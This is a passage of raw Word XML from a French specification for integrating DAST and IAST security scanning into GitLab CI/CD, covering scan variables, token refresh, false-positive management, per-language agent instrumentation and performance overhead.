          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - .pre             # controle conformite pipeline</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - build</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - test             # IAST actif (agent injecte)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - deploy-staging   # deploiement OBLIGATOIRE avant scan</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - security-dast    # DAST sur l'endpoint deploye</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - publish          # SARIF -&gt; GitLab Dashboard + VOC</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dast-scan:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  stage: security-dast</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  timeout: 20 minutes       # strict - ne jamais bloquer indefiniment</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_TARGET_URL:         $CI_ENVIRONMENT_URL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_API_SPEC:           openapi.yaml</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_AUTH_TOKEN:         $DAST_SECRET_TOKEN  # variable masquee</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_SEVERITY_THRESHOLD: CRITICAL             # gate bloquant</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_RATE_LIMIT:         20                   # req/s max</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_EXCLUDE_URLS:       '/actuator,/health,/metrics'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  needs: [deploy-staging]</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2.2.2   Token refresh mid-scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Un scan DAST complet dure 15 a 60 minutes. Un JWT de 15 minutes invalide silencieusement la moitie du scan - les vulnerabilites des endpoints proteges sont ignorees sans alerte dans le pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le plugin doit gerer le renouvellement automatique du token pendant le scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="55" w:before="55"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Alerte obligatoire si le refresh echoue : le scan doit s'arreter et remonter une erreur explicite, pas continuer silencieusement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2.3   Architecture de la baseline FP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">La gestion des faux positifs doit reposer sur un serveur centralise, sur le modele de CxSAST (Checkmarx), et non sur un simple fichier YAML committe dans le repo.</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Critere</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fichier Git (insuffisant)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Serveur centralise (requis)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Stockage FP</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Fichier YAML dans le repo</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Base de donnees serveur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Ancre du FP</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Pattern endpoint/regle</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Hash de reponse HTTP + endpoint + parametre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Invalidation si code change</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Manuelle</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Automatique si hash reponse change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Risque contournement dev</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Haut - edition directe du YAML</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Faible - acces serveur controle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Expiration FP</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 native</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Configurable (90 jours recommandes)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Audit trail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Git blame (insuffisant)</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Natif serveur - qui, quand, pourquoi</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Donnees sensibles dans repo</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Risque expose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Non - restent cote serveur</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2.3   DAST On-Demand —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Critere</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CI/CD</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 On-Demand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Declenchement</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Automatique sur push / MR</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Manuel ou planifie (cron)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Environnement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Staging / Integration</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Preprod / Production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Mode scan</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Actif complet</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Passif + actif limite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Duree</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5-20 min (gate bloquant)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30-120 min (rapport asynchrone)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Rate limiting</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 req/s max</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req/s max + delai inter-requetes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Circuit breaker</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Timeout 20 min strict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Arret si taux 5xx &gt; 5% sur 2 min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Plage horaire</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Aucune restriction (env. isole)</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Configurable (hors heures de pic)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Authentification</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Variables GitLab CI/CD protegees</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Vault (CyberArk / HashiCorp)</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Payload prod</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Donnees de test quelconques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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Donnees fictives, IBAN Luhn-valides inexistants, comptes sandbox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Rapport</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SARIF -&gt; GitLab Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="34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PDF/HTML -&gt; CSIRT / RSSI</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2.4   IAST — Contraintes techniques multi-langages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.1   Mecanisme d'instrumentation par langage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200"/>
        <w:gridCol w:w="18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Mecanisme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1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Java / JVM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Java Agent (-javaagent). Bytecode via ASM/Javassist. Zero modif code.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Spring Boot, Micronaut, Quarkus, Jakarta EE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JAVA_TOOL_OPTIONS ou CATALINA_OPTS. JVM 8+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Middleware WSGI/ASGI ou monkey-patching. Import via .pth ou sitecustomize.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Django, Flask, FastAPI, Starlette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pip install iast-agent + PYTHONSTARTUP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Node.js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Agent via --require (NODE_OPTIONS=--require).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Express, Fastify, NestJS, Hapi, Koa</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NODE_OPTIONS=--require /opt/iast/agent.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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 / 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CLR Profiling API. Variables CORECLR_ENABLE_PROFILING.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ASP.NET Core, WebAPI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CORECLR_ENABLE_PROFILING=1 + PROFILER_PATH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Obligatoire</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Instrumentation statique : rebuild avec lib IAST. Recompilation requise.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net/http, Gin, Echo, Fiber</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 flag -tags iast ou go:generate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Extension PHP (.so). Auto-chargee via php.ini.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Laravel, Symfony, WordPress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extension=iast_agent.so dans php.ini</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Ruby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Rack middleware ou Gemfile.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Rails, Sinatra, Grape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gem iast-agent dans Gemfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Recommande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24" w:sz="1"/>
              <w:left w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:bottom w:val="single" w:color="7F4F24" w:sz="1"/>
              <w:right w:val="single" w:color="7F4F24" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FCE5CD"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Go : l'absence de bytecode dynamique implique une recompilation. Verifier que l'outil retenu supporte Go nativement - exiger une demonstration sur un service Go lors du benchmark.</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2.4.2   Exemple de configuration CI/CD multi-langages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D1117" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="110"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="110"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Java / Spring Boot</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">test-iast-java:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  stage: test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    JAVA_TOOL_OPTIONS: '-javaagent:/opt/iast/agent.jar -Diast.api.key=$IAST_API_KEY -Diast.sourcecode.enabled=true'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  script: [mvn test]</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 Python / Django</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">test-iast-python:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  stage: test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  before_script: [pip install iast-agent --break-system-packages]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    PYTHONSTARTUP: /opt/iast/sitecustomize.py</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    IAST_API_KEY: $IAST_API_KEY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  script: [pytest tests/]</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 Node.js / Express</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">test-iast-node:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  stage: test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    NODE_OPTIONS: '--require /opt/iast/agent.js'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    IAST_API_KEY: $IAST_API_KEY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  script: [npm test]</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 .NET / C#</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">test-iast-dotnet:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  stage: test</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    CORECLR_ENABLE_PROFILING: '1'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    CORECLR_PROFILER: '{IAST-GUID}'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    CORECLR_PROFILER_PATH: /opt/iast/iast_profiler.so</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    IAST_API_KEY: $IAST_API_KEY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C9D1D9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  script: [dotnet test]</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2.4.3   Overhead et performance par langage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000"/>
        <w:gridCol w:w="20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Overhead CPU</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Overhead memoire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latence tests</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Acceptable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Java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8%</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+ 50-150 MB heap</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10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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+ 20-50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12%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Node.js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8%</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+ 30-80 MB</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10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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+ 40-100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10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Go</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+ 10-30 MB</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5%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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+ 20-40 MB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15%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Verifier</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2.5   Prerequis d'Integration GitLab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560"/>
        <w:gridCol w:w="2106"/>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Prerequis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 Attendu technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
